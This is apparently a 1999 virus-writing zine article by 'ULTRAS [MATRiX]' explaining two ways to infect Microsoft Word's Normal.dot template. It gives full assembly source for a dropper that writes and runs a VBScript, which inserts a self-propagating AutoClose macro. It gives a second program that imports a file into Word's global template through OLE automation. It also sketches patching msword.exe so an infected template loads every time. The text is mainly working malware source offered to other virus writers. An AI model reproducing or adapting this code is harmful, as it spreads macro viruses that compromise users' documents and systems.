W0rd infecion ~~~~~~~~~~~~~ In this articles I shall try to tell about infection w0rd. At the given moment I know 4 methods of infection in this articles i shall try to tell about 2 ways of infection which in my opinion best... 1. W0rd infection use script 2. W0rd infection use win32 OLE API The first method was written by me in the beginning of 1999, but as in that time I badly knew Assembler my friends not so wanted me to help though spoke that it is good idea. Long time I could not write the time has passed and I have written DOS and then and Win32 the version... The second method was written not by me and author on a name T2000 (heya!!) Each this algorithm is good on.... [ First method ] This method uses VBScript for penetration in w0rd. It very simply we create a file on a disk "c:\avsux.vbs" and is written down there w0rd of infection and dropeer of a virus... All is very simple and easily. This method has pluss and minuses... -> look source code: ; W0rd infection script by ULTRAS ; (ñ) march 1999 .586p .model flat jumps extrn WriteFile:PROC extrn CloseHandle:PROC extrn CreateFileA:PROC extrn ExitProcess:PROC .data num_bytes_written dd ? vfile db 'c:\w0rd.vbs',00h flz_handle dd ? vscript_filesize equ offset script_end - offset script_start FILE_ATTRIBUTE_NORMAL equ 00000080h CREATE_ALWAYS equ 00000002h FILE_SHARE_READ equ 00000001h GENERIC_WRITE equ 40000000h ;********************************** ; W0rd infection script start here ;********************************** script_start: db 'On Error Resume Next',0dh,0ah Db 'Dim WordObj',0dh,0ah ;**************************************** ; Open W0rd aka N0rmal.dot (hide process) ;**************************************** db 'Set WordObj = WScript.CreateObject("Word.Application")',0dh,0ah ;********************************** ; Insert to "ThisDocuments" module ;********************************** Db 'Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule',0dh,0ah ;**************** ; Need Parametrs ;**************** db 'WordObj.Options.SaveNormalPrompt = False',0dh,0ah ;********************************************* ; Delete all string in "ThisDocuments" module ;********************************************* db 'NT.DeleteLines 1, NT.CountOfLines',0dh,0ah ;**************************** ; Write u virus macro code!!! ;**************************** db 'NT.InsertLines 1, "Sub AutoClose()"',0dh,0ah db 'NT.InsertLines 2, "On Error Resume Next"',0dh,0ah db 'NT.InsertLines 3, "NormalTemplate.VBProject.VBComponents(""ThisDocument"").Name = ""Vecna"""',0dh,0ah db 'NT.InsertLines 4, "Application.VBE.ActiveVBProject.VBComponents(""W0rd"").Export ""c:\"" & Application.UserName & "".pgp"""',0dh,0ah db 'NT.InsertLines 5, "For U = 1 To NormalTemplate.VBProject.VBComponents.Count"',0dh,0ah db 'NT.InsertLines 6, "If NormalTemplate.VBProject.VBComponents(U).Name = ""W0rd"" Then NormalInfect = True"',0dh,0ah db 'NT.InsertLines 7, "Next U"',0dh,0ah db 'NT.InsertLines 8, "For U = 1 To ActiveDocument.VBProject.VBComponents.Count"',0dh,0ah db 'NT.InsertLines 9, "If ActiveDocument.VBProject.VBComponents(U).Name = ""W0rd"" Then ActiveInfect = True"',0dh,0ah db 'NT.InsertLines 10, "Next U"',0dh,0ah db 'NT.InsertLines 11, "If ActiveInfect = True And NormalInfect = False Then Set mOn = NormalTemplate.VBProject Else _"',0dh,0ah db 'NT.InsertLines 12, "If ActiveInfect = False And NormalInfect = True Then Set mOn = ActiveDocument.VBProject"',0dh,0ah db 'NT.InsertLines 13, "With mOn"',0dh,0ah db 'NT.InsertLines 14, "With .VBComponents.Import(""c:\"" & Application.UserName & "".pgp"")"',0dh,0ah ; ****************************** ; import u virus debug script... ; ****************************** db 'NT.InsertLines 15, "With .VBComponents.Import("c:\w0rd.scr")"',0dh,0ah ; ********************************** ; call dropper & save w0rd infection ; ********************************** db 'NT.InsertLines 16, "End With"',0dh,0ah db 'NT.InsertLines 17, "End With"',0dh,0ah db 'NT.InsertLines 18, "Call Virusdrop"',0dh,0ah db 'NT.InsertLines 19, "If ActiveInfect = False Then ActiveDocument.SaveAs filename:=ActiveDocument.FullName, FileFormat:=wdFormatDocument"',0dh,0ah db 'NT.InsertLines 20, "End Sub"',0dh,0ah db 'WordObj.Run "Normal.ThisDocument.AutoExec"',0dh,0ah db 'WordObj.Quit',00h script_end: virusname Db 'W0rd Infection Script',00h .code start: ; create virus script push 00000000h push FILE_ATTRIBUTE_NORMAL push CREATE_ALWAYS push 00000000h push FILE_SHARE_READ push GENERIC_WRITE push offset vfile call CreateFileA mov [flz_handle],eax ; shall write down in script push 00000000h push offset num_bytes_written push vscript_filesize push offset script_start push [flz_handle] call WriteFile ; close file push [flz_handle] call CloseHandle push 1 push offset vfile call WinExec exit: push 0 call ExitProcess end start -> end source code here....... Certainly in as to use script of infection w0rd... It will be necessary to take into account that script to register in Normal.dot in "Thisdocuments" module. This script works only under w0rd98/w0rd2000.Scripts it is possible to use not only for infection and others platform (exemple: Excel, Project, PowerPoint etc...) [ Second method ] This method as i already spoke was written by T2000. If for you works at the given moment word that at start of this program it imports a file "c:\ss.sys". This infection is very convenient for resident of viruses... -> look source: ; Win32 OLE Automation code snippet ; ; This little program imports a VB file (c:\ss.sys) into the global ; template (normal.dot) of an active instance of M$-Word. Since this ; code comes from an unfinished virus of mine, it might be a bit ; unreadable at first sight. ; .386 .MODEL FLAT .DATA EXTRN CoInitialize:PROC EXTRN CoUninitialize:PROC EXTRN GetActiveObject:PROC EXTRN SysAllocString:PROC EXTRN ExitProcess:PROC EXTRN MessageBoxA:PROC DISPATCH_METHOD EQU 1h DISPATCH_PROPERTYGET EQU 2h DISPATCH_PROPERTYPUT EQU 4h DISPATCH_PROPERTYPUTREF EQU 8h LOCALE_USER_DEFAULT EQU 400h LOCALE_SYSTEM_DEFAULT EQU 800h DISPID_PROPERTYPUT EQU -3 VT_BSTR EQU 8 VT_BOOL EQU 11 S_OK EQU 0 NormalTemplate EQU 08h ; DispID's. VBProject EQU 63h VBComponents EQU 87h Import EQU 0Dh START: MOV EBP, OFFSET START PUSH 0 CALL CoInitialize OR EAX, EAX JNZ Exit LEA ESI, [EBP+(Word_Object-START)] PUSH ESI PUSH 0 CALL @1 Word_CLSID: DD 000209FFh DW 0 DW 0 DB 0C0h, 0, 0, 0, 0, 0, 0, 46h @1: CALL GetActiveObject OR EAX, EAX ; Is Word active? JNZ Un_Init_Autom LEA EDI, [EBP+(Word_Dispatcher-START)] PUSH EDI CALL @2 IID_IDispatch DD 00020400h DW 0 DW 0 DB 0C0h, 0, 0, 0, 0, 0, 0, 46h @2: PUSH DWORD PTR [ESI] LODSD MOV EAX, [EAX] CALL [EAX] ; Object->QueryInterface (get dispatcher). OR EAX, EAX JNZ Un_Init_Autom CALL @3 DW '\', 's', 's', '.', 's', 'y', 's', 0 @3: CALL SysAllocString OR EAX, EAX JZ Un_Init_Autom ; NormalTemplate.VBProject.VBComponents.Import("c:\ss.sys") MOV [EBP+(Variant_Union-START)], EAX MOV EDI, [EDI] MOV DL, NormalTemplate CALL Invoke_Disp_Get JNZ Un_Init_Autom MOV DL, VBProject CALL Invoke_Disp_Get JNZ Un_Init_Autom MOV DL, VBComponents CALL Invoke_Disp_Get JNZ Un_Init_Autom LEA EAX, [EBP+(Argument_Variant-START)] MOV [EBP+(Disp_Params-START).Arguments], EAX INC DWORD PTR [EBP+(Disp_Params-START).Argument_Count] MOV DL, Import CALL Invoke_Disp_Do JNZ Un_Init_Autom PUSH EAX CALL @4 DB 'Success', 0 @4: CALL @5 DB 'Import succeeded', 0 @5: PUSH EAX CALL MessageBoxA Un_Init_Autom: CALL CoUninitialize Exit: PUSH 0 CALL ExitProcess Result_Variant: DW VT_BSTR ; Union type. DW 0 ; Reserved. DW 0 ; Reserved. DW 0 ; Reserved. Result_Union DD 0 DD 0 Argument_Variant: DW VT_BSTR ; Union type. DW 0 ; Reserved. DW 0 ; Reserved. DW 0 ; Reserved. Variant_Union DD 0 DD 0 IID_NULL: DD 0 DW 0 DW 0 DB 0, 0, 0, 0, 0, 0, 0, 0 IID_IUnknown: DD 0 DW 0 DW 0 DB 0C0h, 0, 0, 0, 0, 0, 0, 46h Invoke_Disp_Do: PUSH DISPATCH_METHOD JMP POP_Action Invoke_Disp_Get: PUSH DISPATCH_PROPERTYGET POP_Action: POP ECX PUSH 0 PUSH 0 LEA EAX, [EBP+(Result_Variant-START)] PUSH EAX LEA EAX, [EBP+(Disp_Params-START)] PUSH EAX PUSH ECX PUSH LOCALE_SYSTEM_DEFAULT LEA EAX, [EBP+(IID_NULL-START)] PUSH EAX MOVZX EDX, DL PUSH EDX PUSH EDI MOV EAX, [EDI] CALL [EAX+18h] ; Dispatch->Invoke MOV EDI, [EBP+(Result_Union-START)] OR EAX, EAX RETN Virus_Size EQU $-START Word_Object DD 0 Word_Dispatcher DD 0 CLSID DD 0, 0, 0, 0 Disp_Params: DD 0 DD 0 DD 0 DD 0 DISPPARAMS STRUC Arguments DD 0 ; Array of arguments. Disp_IDs DD 0 ; Dispatch ID's of named arguments. Argument_Count DD 0 ; Number of arguments. Disp_ID_Count DD 0 ; Number of named arguments. DISPPARAMS ENDS END START -> end source..... Before performance of this program itself it is necessary to create ss.sys where to register the text of infection word and dropper... It is a method very quickly works. [ Theory ] It is possible also using "Win32 OLE API" at opening the document to create in the document module and to finish in the end of a file complete infected PE File. It will be possible to infect It only at resident viruses. And the method is bad that at any rewriting of the infected document PE File will leave :((( As it is possible to look after whence msword.exe takes each time new "normal.dot" if it is not present in the catalogue... If you will find this place that to you it is necessary only patching it, and each time will be loaded new already infected "normal.dot" . :)))) But it only theory and i already as year am not engaged in infection w0rd on asm... [ Conclusion ] If you have what that of a problem or you that that have not understood in articles or even better you want to offer the idea on infection w0rd and others Office platform please mail us: ultras@matrixvx.org I shall be glad to see that that new... Also forgive for mine english... I know my english suxxx... PS: Poorly when beer it is not enough :))) ULTRAS [MATRiX]